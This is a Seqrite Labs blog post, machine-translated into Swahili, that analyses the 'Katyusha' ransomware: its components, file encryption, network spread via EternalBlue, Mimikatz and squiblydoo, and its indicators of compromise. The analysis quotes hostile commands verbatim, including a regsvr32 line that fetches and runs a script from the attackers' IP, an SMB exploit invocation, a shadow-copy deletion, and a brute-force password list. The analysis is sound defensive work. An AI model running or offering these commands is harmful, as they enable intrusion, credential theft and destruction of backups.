• Bidhaa na Huduma
        • Wingu

          • Endpoint Protection
          • Endpoint Detection and Response
          • Mobile Device Management
          • BYOD
          • Extended Detection and Response
          • Zero Trust Network Access
          • Data Privacy
        • Juu ya Prem

          • Endpoint Protection
          • Endpoint Detection and Response
          • Data Privacy
        • Jukwaa

          • Malware Analysis Platform
        • Biashara ndogo ndogo

          • SOHO Total Edition
        • Huduma

          • Threat Intel
          • Digital Risk Protection Services (DRPS)
          • Ransomware Recovery as a Services (RRaaS)
          • DPDP Compliance
          • Managed Detection and Response
          • Usalama wa Mtandao & Data Privacy Ufahamu
  • Ufumbuzi
    • BFSI
    • elimu
    • Serikali
    • Afya
    • ITES
    • viwanda
  • kampuni
    • kuhusu Seqrite
    • Uongozi
    • Tuzo na Vyeti
    • Chumba cha habari
  • Washirika
    • Mshirika wa Mpango
    • Tafuta Mshirika
    • Kuwa Mshirika
  • Msaada
  • rasilimali
    • blogs
    • Whitepapers
    • Datasheets
    • Michanganuo
    • Ripoti za Tishio
    • Miongozo ya
    • PoV
    • uelewa Data Privacy
    • Angalia Alama Yako ya Hatari
    • Mazungumzo ya DPDP
    • Saa ya Faragha
Seqrite Labs blogu
Mauzo ya kuwasiliana Je, uko chini ya mashambulizi?
  • Bidhaa na Huduma
        • Wingu

          • Endpoint Protection
          • Endpoint Detection and Response
          • Mobile Device Management
          • BYOD
          • Extended Detection and Response
          • Zero Trust Network Access
          • Data Privacy
        • Juu ya Prem

          • Endpoint Protection
          • Endpoint Detection and Response
          • Data Privacy
        • Jukwaa

          • Malware Analysis Platform
        • Biashara ndogo ndogo

          • SOHO Total Edition
        • Huduma

          • Threat Intel
          • Digital Risk Protection Services (DRPS)
          • Ransomware Recovery as a Services (RRaaS)
          • DPDP Compliance
          • Managed Detection and Response
          • Usalama wa Mtandao & Data Privacy Ufahamu
  • Ufumbuzi
    • BFSI
    • elimu
    • Serikali
    • Afya
    • ITES
    • viwanda
  • kampuni
    • kuhusu Seqrite
    • Uongozi
    • Tuzo na Vyeti
    • Chumba cha habari
  • Washirika
    • Mshirika wa Mpango
    • Tafuta Mshirika
    • Kuwa Mshirika
  • Msaada
  • rasilimali
    • blogs
    • Whitepapers
    • Datasheets
    • Michanganuo
    • Ripoti za Tishio
    • Miongozo ya
    • PoV
    • uelewa Data Privacy
    • Angalia Alama Yako ya Hatari
    • Mazungumzo ya DPDP
    • Saa ya Faragha
Nyumbani  /  ransomware  / Ransomware ya Kisasa : "Katyusha"
Ransomware ya kisasa : "Katyusha"
14 Desemba 2018

Ransomware ya kisasa : "Katyusha"

Imeandikwa na Ghanshyam Zaidi
Ghanshyam Zaidi
ransomware
17
hisa

Kwa miezi kadhaa, Maabara ya Usalama ya Quick Heal imekuwa ikiona ongezeko la ransomware, tumepata ransomware nyingine ya kuvutia ambayo husimba faili kwa njia fiche na kuongeza kiendelezi ".katyusha" na kudai kiasi cha 0.5 btc ndani ya siku tatu na kutishia kutoa data hiyo kwa umma ikiwa fidia haitalipwa. Programu hasidi imeunganishwa na vipengele vingi ikiwa ni pamoja na kutumia " Double pulsar " na " Eternal blue " ambayo hutumika kusambaa kwenye mtandao. Pia, hutumia mbinu ya kipekee ya kushambulia inayoitwa " squiblydoo " kusambaa kwenye mtandao. Kiashiria cha maambukizi cha ransomware hii bado hakijathibitishwa, lakini kwa msingi wa sifa ransomware hii inaweza kuingia kwenye mfumo kupitia ulaghai wa kisiri, ulaghai, barua taka, ulaghai wa SMB n.k.

Uchambuzi wa Kiufundi :

Programu hasidi hii imejaa MPRESS(v2.19) na inapatikana kwenye mfumo wa mwathiriwa kwa jina " katyusha.exe " katika "%temp%". Ina vipengele vitatu. Inapotekelezwa, inaviingiza kwenye C:\Windows\Temp na kuanza utekelezaji wake:

  • Svchost0.bat
  • Zkts.exe
  • Ktsi.exe

Katyusha hukagua faili zifuatazo kwenye mfumo ili kubaini ikiwa mfumo tayari umeambukizwa au la.

"C:\_how_to_decrypt_you_files.txt"

"C:\ProgramData\_how_to_decrypt_you_files.txt"

Ikiwa mfumo tayari umeambukizwa, Katyusha huunda faili batch (svchost0.bat) ambayo ina msimbo kama inavyoonyeshwa kwenye Mchoro.1. kufuta nakala ya kibinafsi na kusitisha yenyewe. Ikiwa mfumo haujaambukizwa basi huacha zkts.exe na ktsi.exe na kuzitekeleza.

Kielelezo cha 1: Maudhui ya Svchost0.bat

 

Zkts.exe :

Faili hii ni 7zip inayoweza kutekelezeka na kipengee kikuu ambacho kina moduli ndogo nyingi kama moduli ya kueneza mtandao, moduli ya kuiba nenosiri, n.k.

Katika utekelezaji wa zkts.exe, hutoa vipengele katika " C:\Windows\Temp " kama vile Mimikatz, katyusha.dll, eternal blue exploit, n.k. ambavyo baadaye hutumiwa na Katyusha kufanya shughuli.

Kielelezo 2.Faili Imeshuka na zkts.exe

 

Ktsi.exe (Kisimbaji fiche):

Hii ni sehemu nyingine kuu ambayo pia ni faili iliyopakiwa ya MPRESS. Inatumika zaidi kwa usimbaji fiche wa faili na kudondosha noti ya fidia kwenye mfumo wa mwathiriwa. Mchakato huu unaanza kwa kujitegemea na upakiaji mkuu (katyusha.exe) kama inavyoonyeshwa kwenye Mchoro 3.

Kielelezo cha 3: Piga simu kwa CreateProcess() kwa ktsi.exe

 

Kwenye utekelezaji wa ktsi.exe, kwanza huua orodha ya kazi zifuatazo kutoa vishikizo vya faili ambavyo vimefungwa na michakato inayofaa ya kusimba (kama vile faili za db, nk) kama inavyoonyeshwa kwenye Mchoro 4.

Ili kusimba faili zinazohusiana na hifadhidata kwa mafanikio, ktsi inaua michakato ambayo inahusiana na programu tumizi za hifadhidata. Ifuatayo ni orodha ya michakato iliyosimbwa kwa bidii katika programu hasidi:

mysqld.exe  httpd.exe  sqlsevr.exe
sqlwriter.exe  w3wp.exe  sqlagent.exe
fdhost.exe  fdlauncher.exe  kuripotiserviceservice.exe
omtsreco.exe   tnslsnr.exe   oracle.exe
emagent.exe  mysqld-nt.exe
Kielelezo cha 4: Utekelezaji wa amri ya Taskkill.

Baada ya utendakazi wa programu hasidi hudondosha noti ya fidia katika html na umbizo la txt kwenye njia iliyo chini ili kuifanya ionekane kwa watumiaji wote wakati wa kuanzisha mfumo,

"C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup"

_how_to_decrypt_you_files.txt

_how_to_decrypt_you_files.html

Katika “C:\ProgramData” na kwenye mzizi wa hifadhi ya C(C:\) dondosha dokezo la fidia pekee kama “_how_to_decrypt_you_files.txt”.

 

Kielelezo cha 5: Dokezo la Fidia

Ktsi.exe pia hufuta nakala ya kivuli kwa kutekeleza amri ifuatayo,

"Vssadmin futa vivuli / vyote / kimya"

Mchoro wa 6: futa nakala ya kivuli

 

Baada ya kazi hizi zote, ktsi.exe huanza usimbaji fiche wa faili (RSA) kwa msaada wa mbinu ya kawaida ya usimbaji fiche ya CRYPTOGAMS . Saini zinazohusiana na algoriti hii zinapatikana katika faili, kama inavyoonyeshwa kwenye Mchoro 7.

Kielelezo cha 7: Kamba za Cryptogams.

 

Inasimba faili zote za kiendelezi isipokuwa ifuatayo,

Kielelezo cha 8: Viendelezi Vilivyotengwa kutoka kwa usimbaji fiche.

Pia ina orodha ya kutengwa ya faili na folda (kama inavyoonyeshwa kwenye tini 9) ikiwa maneno haya yatapatikana katika njia ya faili iliyoorodheshwa basi itatenga njia hiyo kutoka kwa usimbaji fiche. Ili kutekeleza usimbaji fiche usiokatizwa, orodha ina majina ya bidhaa chache za usalama.

Kielelezo cha 9: Orodha ya kutengwa ya Faili na Folda.

 

Utaratibu wa Kueneza:

Kwa uenezaji wa mtandao, faili zilizotolewa kutoka kwa zkts huja katika jukumu. Tafadhali rejelea Kielelezo 2 kwa vipengele vilivyotolewa.

m32.exe na m64.exe ni zana ya Mimikatz ambayo hutumiwa kupata hati tambulishi kutoka kwa windows lsass.exe.

Kwanza, katyusha.exe huamua ikiwa mfumo ni 64bit au 32bit kwa kutumia simu ya mfumo IsWow64Process (hurejesha thamani isiyo ya kawaida ikiwa mfumo ni 64-bit) na kutekeleza Mimikatz kulingana na usanifu wa mfumo.

Zana ya Mimikatz huachilia faili zinazofuata katika “C:\Windows\Temp” kama matokeo.

– snamelog : ina majina ya watumiaji yaliyoletwa.

– spaslog : ina manenosiri ya majina ya watumiaji yanayoletwa.

Kielelezo cha 10: Angalia ili kuamua aina ya mfumo na uanze Mimikatz.

Baada ya utekelezaji wa mimikatz, katyusha.exe inasoma majina ya watumiaji kutoka kwa snamelog na nywila kutoka kwa spasslog ambayo hutumiwa kufanya shambulio la nguvu kwenye mtandao.

Zkts.exe pia matone svchostb.exe, svchostb.xml, svchostbs.exe, svchostbs.xml, katyusha.dll na svchostp.exe. Vipengele hivi hutumiwa kueneza Katyusha kwenye mtandao.

Kwa usaidizi wa unyonyaji wa milele wa bluu na pulsar mbili, programu hasidi hutekeleza katyusha.dll kwenye mifumo iliyounganishwa kwenye mtandao kwa mfuatano. Kwa katyusha.exe hii tumia hatari ya SMB kwa msaada wa amri ifuatayo,

"C:\windows\temp\&svchostb.exe -TargetIp & svchostbs.exe –OutConfig s –TargetPort 445 –Itifaki SMB –Architecture x64 –Function RunDLL –DllPayload katyusha.dll –TargetIp ”

Kielelezo cha 11: Utekelezaji wa unyonyaji kwenye kila mfumo kwenye mtandao.

Katyusha.dll ni faili ya upakiaji ina msimbo wa kutekeleza amri ifuatayo,

"regsvr32 /u /s /i:hxxp://86.106.102.147/img/katyusha.data scrobj.dll"

Tunaweza pia kupata mifuatano ya amri yenye msimbo mgumu katika faili kama inavyoonyeshwa kwenye Mchoro 12.

Kielelezo 12: Amri ya kupakua na kutekeleza hati kutoka kwa Url

Unapotekeleza amri ya regsvr32 (Seva ya Usajili ya Microsoft) hapo juu, itapakua hati (katyusha.data) kutoka kwa URL iliyotolewa na kuita seva ya kufuta usajili kwa kutumia kigezo cha regsvr32 (/u). Hii itatekeleza msimbo wa javascript chini ya lebo ya <registration> kutoka kwa hati iliyopakuliwa kama inavyoonyeshwa kwenye Mchoro 13. Hati ina msimbo wa kupakua katyusha.exe kutoka kwa Url iliyotolewa kwenye saraka ya "%temp%" na kuitekeleza.

Kielelezo 13: maudhui ya hati ya katyusha.data
Kielelezo 14: Pakua ombi la hati na mzigo wa malipo katika mfumo ulioambukizwa.

Shambulio kama hilo lenye amri za regsvr32 ili kupakua hati kutoka kwa C&C na kuzitekeleza hujulikana kama "squiblydoo".

Baada ya hatua iliyo hapo juu, pia huenda kwenye mifumo ya nguvu kali kwenye mtandao kwa msaada wa Zana ya Utawala wa Nguvu (svchostp.exe). Zana hii ni sawa na zana ya sysinternals PsExec , inayotumika kutekeleza michakato kwenye mfumo wa mbali. Ransomware hii yenyewe ina orodha ya majina machache ya watumiaji na nywila kama ilivyoonyeshwa hapa chini, pamoja na kwamba pia hutumia majina ya watumiaji na nywila zilizoletwa na Mimikatz (snamelog na spasslog) kwa shambulio la nguvu kali.

Majina ya Watumiaji :

Msimamizi, msimamizi, +maudhui ya snamelog.

Manenosiri :

admin, 12345, chinachina203, 111, 123456, qwerty, mtihani, abc123, 12345678, 0000, 1122, 1234, +yaliyomo ya spaslog.

Kwa kulazimisha kikatili, katyusha hutumia amri ifuatayo:

"C:\Windows\temp\svchostp.exe -u -p -n 10 -s regsvr32 /u /s /i:https://86.106.102.147/img/katyusha.data scrobj.dll”

Amri iliyo hapo juu hutekeleza tu matumizi ya regsvr32 na url kama kigezo cha kupakua upakiaji na kufanya shughuli kama ilivyoelezwa hapo juu kwa katyusha.dll.

Kielelezo 15.Matumizi ya zana ya msimamizi wa nguvu (svchostp.exe)

IOC :

MD5: 7f87db33980c0099739de40d1b725500

   Urls:

  1.  hxxp://86.106.102.147/img/katyusha.data
  2. hxxp://86.106.102.147/img/katyusha.exe

Anwani ya Pochi ya Bitcoin: “3ALmvAWLEothnMF5BjckAFaKB5S6zan9PK”

Hitimisho :

Mwaka huu tumeona ongezeko la idadi ya ransomware, wanatumia njia mpya za kueneza na pia kwa kusimba data. Sasa, maradhi mengi ya fidia yameunganishwa na matumizi mabaya na zana kama vile bluu ya milele, mimikatz za kueneza kwenye mtandao. Tunapendekeza watumiaji waepuke kufikia Url/barua pepe zinazotiliwa shaka, watumie vitambulisho thabiti vya mfumo na kusasisha kingavirusi yao.

Mtaalam wa Mada:

Pratik Pachpor | Maabara ya Usalama ya Uponyaji Haraka

 Baada uliopitaCVE-2018-15982- Matumizi ya Adobe Flash Player baada ya bure (Siku ya Sifuri) yanaathirika...
Post ijayo  Roho Imefika
Ghanshyam Zaidi

Kuhusu Ghanshyam More

Ghanshyam ni mtafiti wa usalama katika Maabara ya Usalama ya Quick Heal. Ana nia ya kubadili uhandisi na kuchambua udhaifu wa kiusalama na...

Makala na Ghanshyam Zaidi »

Related Posts

  • Mbinu Bora za Kukabiliana na Matukio kwa Mashambulizi ya Ransomware ili Kupunguza Uharibifu

    Juni 2, 2026
  • Jinsi ya Kupona kutokana na Shambulio la Ransomware Bila Kulipa Fidia

    Huenda 25, 2026
  • Shambulio la Ransomware Kuhusu Miunganisho ya SMB2 Inayoshirikiwa Hadharani na Kuendelea Kulindwa na Seqrite

    Machi 11, 2025
Waandishi Walioangaziwa
  • Seqrite
    Seqrite

    Seqrite ni mtoa huduma anayeongoza wa suluhisho za usalama wa mtandao wa biashara. Kwa kuzingatia...

    Soma makala zaidi na Seqrite
  • Jyoti Karlekar
    Jyoti Karlekar

    Mimi ni mwandishi mahiri ambaye anafurahia kuunda maudhui kuhusu teknolojia zinazoibuka na...

    Soma nakala zaidi za Jyoti Karlekar
  • Bineesh P
    Bineesh P

    Mimi ni mpenda usalama wa mtandao na mwandishi aliyejitolea. Kwa ustadi...

    Soma makala zaidi kutoka kwa Bineesh P
  • Sanjay Katkar
    Sanjay Katkar

    Sanjay Katkar ni Mkurugenzi Mkuu Mtendaji wa Quick Heal Technologies...

    Soma makala zaidi kutoka kwa Sanjay Katkar
mada
anayeweza (25) Mashambulizi ya mtandao (36) it-mashambulizi (58) cyberattack (16) cyberattacks (15) Usalama (342) usalama it (34) Tishio la mtandao (33) vitisho it (51) uvunjaji wa data (56) uvunjaji wa data (29) hasara data (28) kuzuia kupoteza data (34) data privacy (16) ulinzi wa data (34) usalama wa data (19) DLP (50) DPDP (14) DPDPA (17) Encryption (16) usalama wa mwisho (113) Usalama wa biashara (20) Tumia (13) GDPR (14) zisizo (76) uchambuzi wa programu hasidi (14) shambulio hasidi (23) MDM (27) microsoft (15) MITER AT&CK (14) Usalama wa mtandao (26) Hadaa (30) ransomware (69) shambulio la kujitolea (31) mashambulizi ya fidia (31) ulinzi wa ukombozi (17) Seqrite (41) Seqrite Encryption (27) Seqrite EPS (33) Seqrite Huduma (16) kugundua tishio (14) Threat Intelligence (22) UTM (34) Mazingira magumu (16) uaminifu sifuri (13)
Seqrite Labs

Mtoa huduma mkuu wa biashara wa suluhu za usalama wa IT hurahisisha sehemu ya mwisho, data na usalama wa mtandao kwa uzuiaji wa vitisho vya kiwango cha juu zaidi, ugunduzi na majibu ulimwenguni kote.

Soma Zaidi Kuhusu Seqrite

Kufuata yetu:

Kujiunga na jarida letu

Pata habari kuhusu mitindo na maarifa ya hivi punde ya usalama wa mtandao.

Upakiaji
Bidhaa na Huduma
  • Wingu
  • Endpoint Protection
  • Endpoint Detection and Response
  • Mobile Device Management
  • BYOD
  • Extended Detection and Response
  • Zero Trust Network Access
  • Data Privacy
  • Juu ya Prem
  • Endpoint Protection
  • Endpoint Detection and Response
  • Data Privacy
  • Jukwaa
  • Malware Analysis Platform
  • Biashara Ndogo
  • SOHO Total Edition
  • Huduma
  • Threat Intel
  • Digital Risk Protection Services (DRPS)
  • Ransomware Recovery as a Services (RRaaS)
  • DPDP Compliance
  • Managed Detection and Response
  • Usalama wa Mtandao & Data Privacy Ufahamu
rasilimali
  • blogs
  • Whitepapers
  • Datasheets
  • Ripoti za Tishio
  • Miongozo ya
  • PoV
  • uelewa Data Privacy
  • Mazungumzo ya DPDP
  • Sera na Uzingatiaji
  • EULA
  • GoDeep.AI
  • SIA
  • Saa ya Faragha
Wasiliana Nasi
  • Ofisi zilizosajiliwa
  • Wacha tuzungumze kuhusu Usalama wa Mtandao
Msaada
  • Msaada wa kiufundi
  • Pakua Programu
  • Kisasishaji cha Nje ya Mtandao
  • Kuboresha Firmware
  • Upgrades
  • Hati ya Bidhaa
Kuhusu Sisi
  • kuhusu Seqrite
  • Uongozi
  • Tuzo na Utambuzi
  • Chumba cha habari
Partner
  • Mshirika wa Mpango
  • Tafuta Mshirika
  • Kuwa Mshirika
  • Seqrite vyeti

© 2026 Quick Heal Technologies Ltd.

Wa tovuti Sera ya faragha Taarifa za kisheria Sera za Vidakuzi Masharti ya matumizi